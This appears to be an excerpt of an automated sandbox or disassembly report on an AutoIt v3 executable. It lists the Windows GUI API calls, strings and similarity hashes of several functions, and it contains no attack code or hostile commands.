GetWindowLongW.USER32(00000000,000000F0), ref: 001CAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001CACA7
GetWindowTextW.USER32 ref: 001CACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 001CACEC
DrawFocusRect.USER32 ref: 001CACF7
GetSysColor.USER32(00000011), ref: 001CAD05
SetTextColor.GDI32(?,00000000), ref: 001CAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 001CAD21
SelectObject.GDI32(?,001CA869), ref: 001CAD38
DeleteObject.GDI32(?), ref: 001CAD43
SelectObject.GDI32(?,?), ref: 001CAD49
DeleteObject.GDI32(?), ref: 001CAD4E
SetTextColor.GDI32(?,?), ref: 001CAD54
SetBkColor.GDI32(?,?), ref: 001CAD5E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 9604a3ba8266d6543476da9fb1d41324233e5c33e3852ef271ccb1b6bc4e4f29
Instruction ID: f94784bd49edbc69443fb5722737ccb1469f40b9a1a264e48d1de6fb97cb1931
Opcode Fuzzy Hash: 9604a3ba8266d6543476da9fb1d41324233e5c33e3852ef271ccb1b6bc4e4f29
Instruction Fuzzy Hash: 73615C71900218AFDB119FA8DC48FAE7F7AEF08320F144129F915AB2A1D771DD81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C8C44, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001C8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001C8D45
CharNextW.USER32(0000014E), ref: 001C8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001C8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001C8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001C8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 001C8DF9
SetWindowTextW.USER32(?,0000014E), ref: 001C8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 001C8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 001C8E8C
_memset.LIBCMT ref: 001C8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 001C8EFA
_memset.LIBCMT ref: 001C8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 001C8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 001C8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 001C9088
InvalidateRect.USER32(?,00000000,00000001), ref: 001C90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001C90F4
SetMenuItemInfoW.USER32 ref: 001C9121
DrawMenuBar.USER32(?), ref: 001C9130
SetWindowTextW.USER32(?,0000014E), ref: 001C9158

Strings

0, xrefs: 001C90C2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 5d755b9d97b996fba7ccd01cddcaa41550a5df3b3650282b70152bfcce04e6fc
Instruction ID: 64c2f67bed71050a892ef9973a221fd5b9730e1336aa3f7b62b82c103c68fc08
Opcode Fuzzy Hash: 5d755b9d97b996fba7ccd01cddcaa41550a5df3b3650282b70152bfcce04e6fc
Instruction Fuzzy Hash: CEE17070900219ABDF209F54CC89FEE7BB9EF25720F14815DF916AA291DB70CA85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 001C4B16, Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001C4C51
GetDesktopWindow.USER32 ref: 001C4C66
GetWindowRect.USER32 ref: 001C4C6D
GetWindowLongW.USER32(?,000000F0), ref: 001C4CCF
DestroyWindow.USER32(?), ref: 001C4CFB
CreateWindowExW.USER32 ref: 001C4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001C4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001C4D68
SendMessageW.USER32(?,00000421,?,?), ref: 001C4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001C4D90
IsWindowVisible.USER32 ref: 001C4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 001C4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 001C4DDF
GetWindowRect.USER32 ref: 001C4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 001C4E1D
GetMonitorInfoW.USER32 ref: 001C4E37
CopyRect.USER32 ref: 001C4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 001C4EB9

Strings

tooltips_class32, xrefs: 001C4D1D
0, xrefs: 001C4BFC
(, xrefs: 001C4E2A

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 97f2b83223c84c681585a938af0a7ab78f4c902534265004bfdf8bc2cff6446d
Instruction ID: 4ea86932338967d9c5b17943b54726d9a6aaaa1d6ba7ac544bb276a346d177d0
Opcode Fuzzy Hash: 97f2b83223c84c681585a938af0a7ab78f4c902534265004bfdf8bc2cff6446d
Instruction Fuzzy Hash: 66B17871608340AFDB04DF64C899F6ABBE5BF98310F00891CF5999B2A1DB71EC45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001A46D6, Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 001A46E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001A470E
_wcscpy.LIBCMT ref: 001A473C
_wcscmp.LIBCMT ref: 001A4747
_wcscat.LIBCMT ref: 001A475D
_wcsstr.LIBCMT ref: 001A4768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001A4784
_wcscat.LIBCMT ref: 001A47CD
_wcscat.LIBCMT ref: 001A47D4
_wcsncpy.LIBCMT ref: 001A47FF

Strings

\VarFileInfo\Translation, xrefs: 001A477C
DefaultLangCodepage, xrefs: 001A47E7
04090000, xrefs: 001A47BA
%u.%u.%u.%u, xrefs: 001A4862
StringFileInfo\, xrefs: 001A4757

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 282500b543393adc9f7c6f5a889bcc85e7cf5720d9fd3dc26e17f64066cead7d
Instruction ID: d06b82cc7c6005e8db353ffd94404488e83185959e61253dad0cc82185cedbeb
Opcode Fuzzy Hash: 282500b543393adc9f7c6f5a889bcc85e7cf5720d9fd3dc26e17f64066cead7d
Instruction Fuzzy Hash: F7413676A00204BBEB11A7A49C43FBF77BCDF52710F14006AF905E7182EB75DA1197A5

Uniqueness

Uniqueness Score: -1.00%

Function 001427D9, Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 001428BC
GetSystemMetrics.USER32 ref: 001428C4
SystemParametersInfoW.USER32 ref: 001428EF
GetSystemMetrics.USER32 ref: 001428F7
GetSystemMetrics.USER32 ref: 0014291C
SetRect.USER32 ref: 00142939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00142949
CreateWindowExW.USER32 ref: 0014297C
SetWindowLongW.USER32 ref: 00142990
GetClientRect.USER32 ref: 001429AE
GetStockObject.GDI32(00000011), ref: 001429CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 001429D5

Part of subcall function 00142344: GetCursorPos.USER32(?,?,002067B0,?,002067B0,002067B0,?,001CC247,00000000,00000001,?,?,?,0017BC4F,?,?), ref: 00142357
Part of subcall function 00142344: ScreenToClient.USER32 ref: 00142374
Part of subcall function 00142344: GetAsyncKeyState.USER32(00000002), ref: 00142399
Part of subcall function 00142344: GetAsyncKeyState.USER32(00000001), ref: 001423A7

SetTimer.USER32(00000000,00000000,00000028,00141256), ref: 001429FC

Strings

AutoIt v3 GUI, xrefs: 00142974

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 8c2bbaf7174d083cfd91941887d8c0c9b181e6a6268ddd3744edb499c49caf4c
Instruction ID: 336359fc973ae203ef527b8fae9732e53102d17bbff3afda257e8bbf17be7894
Opcode Fuzzy Hash: 8c2bbaf7174d083cfd91941887d8c0c9b181e6a6268ddd3744edb499c49caf4c
Instruction Fuzzy Hash: 11B14E7160020AAFDB14DFA8DC49FAE7BB5FB08714F118229FA15E72A0DB74D991CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C4069, Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001C40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001C41B6

Strings

SELECTINVERT, xrefs: 001C4286
SELECT, xrefs: 001C4250
SELECTCLEAR, xrefs: 001C4235
GETTEXT, xrefs: 001C415F
GETSUBITEMCOUNT, xrefs: 001C4141
ISSELECTED, xrefs: 001C41C1
GETSELECTED, xrefs: 001C42E4
VIEWCHANGE, xrefs: 001C4375
GETITEMCOUNT, xrefs: 001C4128
DESELECT, xrefs: 001C42A4
FINDITEM, xrefs: 001C4329
SELECTALL, xrefs: 001C421D
GETSELECTEDCOUNT, xrefs: 001C4199

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 30a2f7eb4198e7094661f234588bd852f5001c2fa8dc37b9c066d293cb011d93
Instruction ID: c34da63dbd7cf066456ca42b6ad72d07614710e8ae71a99a5f3feb8349fe0631
Opcode Fuzzy Hash: 30a2f7eb4198e7094661f234588bd852f5001c2fa8dc37b9c066d293cb011d93
Instruction Fuzzy Hash: 77A1A2702183159BCB14EF50C9A2F7AB3A5BFA4314F14896CB8969B7E2DB30EC05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001B52F0, Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 001B5309
LoadCursorW.USER32(00000000,00007F8A), ref: 001B5314
LoadCursorW.USER32(00000000,00007F00), ref: 001B531F
LoadCursorW.USER32(00000000,00007F03), ref: 001B532A
LoadCursorW.USER32(00000000,00007F8B), ref: 001B5335
LoadCursorW.USER32(00000000,00007F01), ref: 001B5340
LoadCursorW.USER32(00000000,00007F81), ref: 001B534B
LoadCursorW.USER32(00000000,00007F88), ref: 001B5356
LoadCursorW.USER32(00000000,00007F80), ref: 001B5361
LoadCursorW.USER32(00000000,00007F86), ref: 001B536C
LoadCursorW.USER32(00000000,00007F83), ref: 001B5377
LoadCursorW.USER32(00000000,00007F85), ref: 001B5382
LoadCursorW.USER32(00000000,00007F82), ref: 001B538D
LoadCursorW.USER32(00000000,00007F84), ref: 001B5398
LoadCursorW.USER32(00000000,00007F04), ref: 001B53A3
LoadCursorW.USER32(00000000,00007F02), ref: 001B53AE
GetCursorInfo.USER32(?), ref: 001B53BE
GetLastError.KERNEL32(00000001,00000000), ref: 001B53E9

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: f7b54a7ba1f3a9af91c12278b6570cbba3273b64a4a7690ad1447f91d87cff6e
Instruction ID: 158f81aa06350addf2d7832bcf8deff994e5ee27bcf8d576ab5fad333ac67fc8
Opcode Fuzzy Hash: f7b54a7ba1f3a9af91c12278b6570cbba3273b64a4a7690ad1447f91d87cff6e
Instruction Fuzzy Hash: 4F415270E043196ADB109FBA8C49D6FFEB9EF51B50B10452FE509E7290DBB894018E61

Uniqueness

Uniqueness Score: -1.00%

Function 0019AA64, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 0019AAA5
__swprintf.LIBCMT ref: 0019AB46
_wcscmp.LIBCMT ref: 0019AB59
SendMessageTimeoutW.USER32 ref: 0019ABAE
_wcscmp.LIBCMT ref: 0019ABEA
GetClassNameW.USER32 ref: 0019AC21
GetDlgCtrlID.USER32 ref: 0019AC73
GetWindowRect.USER32 ref: 0019ACA9
GetParent.USER32(?), ref: 0019ACC7
ScreenToClient.USER32 ref: 0019ACCE
GetClassNameW.USER32 ref: 0019AD48
_wcscmp.LIBCMT ref: 0019AD5C
GetWindowTextW.USER32 ref: 0019AD82
_wcscmp.LIBCMT ref: 0019AD96

Part of subcall function 0016386C: _iswctype.LIBCMT ref: 00163874

Strings

%s%u, xrefs: 0019AB40

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: d837617b0e733561d91655610bb3b7c2463f75535097f61a67320b90d2823bb7
Instruction ID: 554758baa7c1001b8d887f0fbdc0dfee6870655401aa6728e04b648b3779e5f4
Opcode Fuzzy Hash: d837617b0e733561d91655610bb3b7c2463f75535097f61a67320b90d2823bb7
Instruction Fuzzy Hash: DBA1CE71204306AFDB18DF60C884FAABBE8FF14315F504629F9A9C6590DB30E959CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0019B397, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 0019B3DB
_wcscmp.LIBCMT ref: 0019B3EC
GetWindowTextW.USER32 ref: 0019B414
CharUpperBuffW.USER32(?,00000000), ref: 0019B431
_wcscmp.LIBCMT ref: 0019B44F
_wcsstr.LIBCMT ref: 0019B460
GetClassNameW.USER32 ref: 0019B498
_wcscmp.LIBCMT ref: 0019B4A8
GetWindowTextW.USER32 ref: 0019B4CF
GetClassNameW.USER32 ref: 0019B518
_wcscmp.LIBCMT ref: 0019B528
GetClassNameW.USER32 ref: 0019B550
GetWindowRect.USER32 ref: 0019B5B9

Strings

ThumbnailClass, xrefs: 0019B4A3, 0019B523
@, xrefs: 0019B3BC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 8f5137dcb31f80fdde2e280839b8c89a6c39e4a5b02ddb41a52edc8bab05767f
Instruction ID: 44c0329dc2059f4ee1f4f1299eb30b5e10ac8e50fe9948b09b4ff269216896a1
Opcode Fuzzy Hash: 8f5137dcb31f80fdde2e280839b8c89a6c39e4a5b02ddb41a52edc8bab05767f
Instruction Fuzzy Hash: 01817E710083099BEF04DF10EAC5FAA7BE8EF54314F048569FD859A0A2DB34EE46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001CC8EE, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

DragQueryPoint.SHELL32(?,?), ref: 001CC917

Part of subcall function 001CADF1: ClientToScreen.USER32(?,?), ref: 001CAE1A
Part of subcall function 001CADF1: GetWindowRect.USER32 ref: 001CAE90
Part of subcall function 001CADF1: PtInRect.USER32(?,?,001CC304), ref: 001CAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 001CC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001CC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001CC9AE
_wcscat.LIBCMT ref: 001CC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 001CC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 001CCA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 001CCA25
SendMessageW.USER32(?,000000B1,?,?), ref: 001CCA47
DragFinish.SHELL32(?), ref: 001CCA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001CCB41

Strings

@GUI_DRAGID, xrefs: 001CCAB9
@GUI_DROPID, xrefs: 001CCA6E
pr , xrefs: 001CCA8B
@GUI_DRAGFILE, xrefs: 001CCAF0

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
API String ID: 169749273-3901186176
Opcode ID: 343c46d7684cbb6cfdb357a2d2c7f1fbf38f16cc6ab734907e8aad51c7739b02
Instruction ID: 2ad8ca316c8dc04ba0da0bf2e6932d28f3ef76ab6ff5a51aa5efb69c392a88a3
Opcode Fuzzy Hash: 343c46d7684cbb6cfdb357a2d2c7f1fbf38f16cc6ab734907e8aad51c7739b02
Instruction Fuzzy Hash: 09612871108311AFC701DF64DC89E9BBBE9EFA8750F00092EF595961B1DB70DA49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0019B1E0, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0019B23F

Strings

[HANDLE:, xrefs: 0019B24B
HANDLE=, xrefs: 0019B238
CLASSNAME=, xrefs: 0019B27C
[ALL, xrefs: 0019B2E5
[ACTIVE, xrefs: 0019B22C
ALL, xrefs: 0019B2D3
[LAST, xrefs: 0019B2EC
ACTIVE, xrefs: 0019B21A
[REGEXPTITLE:, xrefs: 0019B267
REGEXP=, xrefs: 0019B254
[CLASS:, xrefs: 0019B28F
LAST, xrefs: 0019B204

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: e3c9b0dfd3edf58cbd771767fc4687d32d67913f4d7fdc1acf3aa5e3daa1c43d
Instruction ID: 82423c1874bece654b43a33295c5cc63eddc20f17fbab1d5c7cc93c54c881497
Opcode Fuzzy Hash: e3c9b0dfd3edf58cbd771767fc4687d32d67913f4d7fdc1acf3aa5e3daa1c43d
Instruction Fuzzy Hash: 03315E35A48209A6DF14FBA0DE83FFEB7A4AF30760F600125B555B20E2EF617E04C951

Uniqueness

Uniqueness Score: -1.00%

Function 0019C4C1, Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0019C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0019C4E6
SetWindowTextW.USER32(?,?), ref: 0019C4FD
GetDlgItem.USER32 ref: 0019C512
SetWindowTextW.USER32(00000000,?), ref: 0019C518
GetDlgItem.USER32 ref: 0019C528
SetWindowTextW.USER32(00000000,?), ref: 0019C52E
SendDlgItemMessageW.USER32 ref: 0019C54F
SendDlgItemMessageW.USER32 ref: 0019C569
GetWindowRect.USER32 ref: 0019C572
SetWindowTextW.USER32(?,?), ref: 0019C5DD
GetDesktopWindow.USER32 ref: 0019C5E3
GetWindowRect.USER32 ref: 0019C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0019C636
GetClientRect.USER32 ref: 0019C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0019C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0019C693

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 81960b73a76d503ec54db6ab32e5b5072221481fa71c734fbaee5e56774d04e1
Instruction ID: b7d037d2b99e9cf6e45dbd07c34a2911475bd338f43ad99ef2c28f08939ea589
Opcode Fuzzy Hash: 81960b73a76d503ec54db6ab32e5b5072221481fa71c734fbaee5e56774d04e1
Instruction Fuzzy Hash: 8E513E71A00709AFEB20DFA8DD89F6EBBB5FF04705F00492CE686A25A0D774E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001CA428, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001CA4C8
DestroyWindow.USER32(00000000,?), ref: 001CA542

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

CreateWindowExW.USER32 ref: 001CA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001CA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001CA5F1
DestroyWindow.USER32(00000000), ref: 001CA613
CreateWindowExW.USER32 ref: 001CA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001CA663
GetDesktopWindow.USER32 ref: 001CA67C
GetWindowRect.USER32 ref: 001CA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001CA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001CA6B3

Part of subcall function 001425DB: GetWindowLongW.USER32(?,000000EB), ref: 001425EC

Strings

0, xrefs: 001CA4DE
tooltips_class32, xrefs: 001CA5B5, 001CA643

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 2cc87f2222b6c40af7120172f8cc6f36e0adb2a49d614bdb3695ac217e5e4f5c
Instruction ID: 5afb48d860b846b75d466f84a73bdf060b2d07ca6ab06fcc1252854e56f9deac
Opcode Fuzzy Hash: 2cc87f2222b6c40af7120172f8cc6f36e0adb2a49d614bdb3695ac217e5e4f5c
Instruction Fuzzy Hash: 13719970140309AFD721CF28DC49F6A7BE6EFA8308F48452DF985872A1C770E956DB12

Uniqueness

Uniqueness Score: -1.00%

Function 001C4619, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001C46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001C46F6

Strings

SELECT, xrefs: 001C48A7
CHECK, xrefs: 001C4716
EXISTS, xrefs: 001C475F
GETITEMCOUNT, xrefs: 001C47D8
GETTEXT, xrefs: 001C4849
GETTOTALCOUNT, xrefs: 001C46DD
UNCHECK, xrefs: 001C48D2
ISCHECKED, xrefs: 001C4879
GETSELECTED, xrefs: 001C4806
EXPAND, xrefs: 001C47A8
COLLAPSE, xrefs: 001C473C

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

